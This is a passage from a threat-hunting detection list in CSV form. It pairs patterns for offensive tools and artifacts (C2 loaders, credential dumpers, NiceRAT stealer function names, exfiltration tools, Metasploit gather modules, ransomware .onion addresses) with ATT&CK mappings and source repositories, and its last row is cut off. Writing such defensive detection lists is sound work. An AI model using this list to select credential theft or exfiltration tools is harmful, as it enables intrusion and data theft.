"*g_hookedSleep.*",".{0,1000}g_hookedSleep\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","45446"
"*g0h4n/RDE1*",".{0,1000}g0h4n\/RDE1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","45447"
"*g0h4n/REC2*",".{0,1000}g0h4n\/REC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","45448"
"*G0ldenGunSec/GetWebDAVStatus*",".{0,1000}G0ldenGunSec\/GetWebDAVStatus.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","45449"
"*G0ldenGunSec/SharpSecDump*",".{0,1000}G0ldenGunSec\/SharpSecDump.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","45450"
"*G1Q+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ*",".{0,1000}G1Q\+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","N/A","https://www.wiz.io/blog/cve-2024-3094-critical-rce-vulnerability-found-in-xz-utils#latest-wiz-research-findings-as-of-april-3-2024-33","10","10","N/A","N/A","N/A","N/A","45451"
"*G374U70F111(*",".{0,1000}G374U70F111\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45454"
"*G3770K3N(*",".{0,1000}G3770K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45455"
"*G3770K3N1NF0(*",".{0,1000}G3770K3N1NF0\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45456"
"*G37800KM4rK5(*",".{0,1000}G37800KM4rK5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45457"
"*G3781111N6(*",".{0,1000}G3781111N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45458"
"*G3784D63(*",".{0,1000}G3784D63\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45459"
"*G378r0W53r5(br0W53rP47H5)*",".{0,1000}G378r0W53r5\(br0W53rP47H5\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45460"
"*G37C00K13(*",".{0,1000}G37C00K13\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45461"
"*G37C0D35(*",".{0,1000}G37C0D35\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45462"
"*G37CC5(*",".{0,1000}G37CC5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45463"
"*G37D15C0rD(*",".{0,1000}G37D15C0rD\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45464"
"*G37D474(*",".{0,1000}G37D474\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45465"
"*G37H1570rY(*",".{0,1000}G37H1570rY\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45466"
"*G37P455W(*",".{0,1000}G37P455W\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45467"
"*G37UHQ6U11D5(*",".{0,1000}G37UHQ6U11D5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45468"
"*G37UHQFr13ND5(*",".{0,1000}G37UHQFr13ND5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45469"
"*G37W3851735(*",".{0,1000}G37W3851735\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45470"
"*g3tsyst3m/undertheradar*",".{0,1000}g3tsyst3m\/undertheradar.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","45471"
"*G47H3rZ1P5(*",".{0,1000}G47H3rZ1P5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45472"
"*gabriellandau/PPLFault*",".{0,1000}gabriellandau\/PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","45473"
"*GadgetToJScript.csproj*",".{0,1000}GadgetToJScript\.csproj.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","45474"
"*GadgetToJScript.exe -a *",".{0,1000}GadgetToJScript\.exe\s\-a\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","45475"
"*GadgetToJScript.sln*",".{0,1000}GadgetToJScript\.sln.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","45476"
"*GadgetToJScript-master*",".{0,1000}GadgetToJScript\-master.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","45477"
"*Gality369/CS-Loader*",".{0,1000}Gality369\/CS\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","45478"
"*gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd.onion*",".{0,1000}gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","45479"
"*gandcrabmfe6mnef.onion*",".{0,1000}gandcrabmfe6mnef\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","45480"
"*GateTrampolin.asm*",".{0,1000}GateTrampolin\.asm.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","45481"
"*gateway-finder*",".{0,1000}gateway\-finder.{0,1000}","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","N/A","1","64","6","2024-01-28T17:04:10Z","2018-04-18T12:43:11Z","45483"
"*gather/credentials/rdc_manager_creds*",".{0,1000}gather\/credentials\/rdc_manager_creds.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45484"
"*gather/credentials/teamviewer_passwords*",".{0,1000}gather\/credentials\/teamviewer_passwords.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45485"
"*gather/credentials/windows_autologin*",".{0,1000}gather\/credentials\/windows_autologin.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45486"
"*gather/enum_ad_bitlocker*",".{0,1000}gather\/enum_ad_bitlocker.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45487"
"*gather/enum_ad_computers*",".{0,1000}gather\/enum_ad_computers.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45488"
"*gather/enum_ad_groups*",".{0,1000}gather\/enum_ad_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45489"
"*gather/enum_ad_managedby_groups*",".{0,1000}gather\/enum_ad_managedby_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45490"
"*gather/enum_ad_to_wordlist*",".{0,1000}gather\/enum_ad_to_wordlist.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45491"
"*gather/enum_ad_user_comments*",".{0,1000}gather\/enum_ad_user_comments.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45492"
"*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45493"
"*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45494"
"*gather/enum_putty_saved_sessions*",".{0,1000}gather\/enum_putty_saved_sessions.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","45495"
"*gather/keylogger*",".{0,1000}gather\/keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","45496"
"*gather/ldap_query*",".{0,1000}gather\/ldap_query.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 